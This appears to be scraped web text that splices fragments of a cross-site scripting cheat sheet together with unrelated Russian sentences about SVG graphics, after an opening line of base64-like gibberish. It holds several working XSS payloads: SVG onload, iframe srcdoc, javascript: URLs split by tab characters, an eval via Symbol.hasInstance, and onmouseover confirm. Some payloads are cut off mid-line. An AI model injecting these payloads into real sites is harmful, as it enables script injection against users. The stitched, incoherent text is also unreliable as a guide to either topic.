8wog70G/2LXA+xIrh03i02Zgavx0Blo+SA5Q+yEcrVSAYvjYBhwEPrEoDZ+KX20wIe7G1ZtwTJIDyMYU+FwBeuGLpaLqg91NcqnqgQU9Yre/ETpzkwXIIKAAmRnQruboUeiVS1cHmF8pcv70bqBVkgak1tgAaYbuw9bj9kFjVN28wsJvxK9VFQDGzjVF7d9+9z1ARJIHyMxRQNo2SDn2408HBsY5njZJPcFbTomJo59H5.
This project forked from hakluke/----svg-onload-alert
<iframe srcdoc="<svg onload=alert(4);>"> Other obfuscation tricks. In this case the HTML encoding and the Unicode encoding trick from the previous section is also valid as you are inside an attribute.
See the ascii chart for more details. The following four XSS examples illustrate this vector: <IMG SRC="jav
ascript:alert('XSS')
Группировка элементов может быть очень полезна не только для организации и структурирования документа. Особую пользу она может принести, если вы захотите добавить к SVG-графике интерактивности или задать какие-то преобразования.
<script>'alert\x281\x29'instanceof{[Symbol.hasInstance]:eval}</script>.
Чуть менее очевидные — SVG-файлы. SVG-изображения основаны на базе XML синтакса и добавление, например, тега script
tab (0x9), newline (0xa) and carriage return (0xd) allowed anywhere after the protocol. Mime type exploitation.
="	javascript:prompt(1)	"> <svg><style>{font-family:'<iframe/onload=confirm(1)>' <input/onmouseover="javaSCRIPT:confirm(1&rpar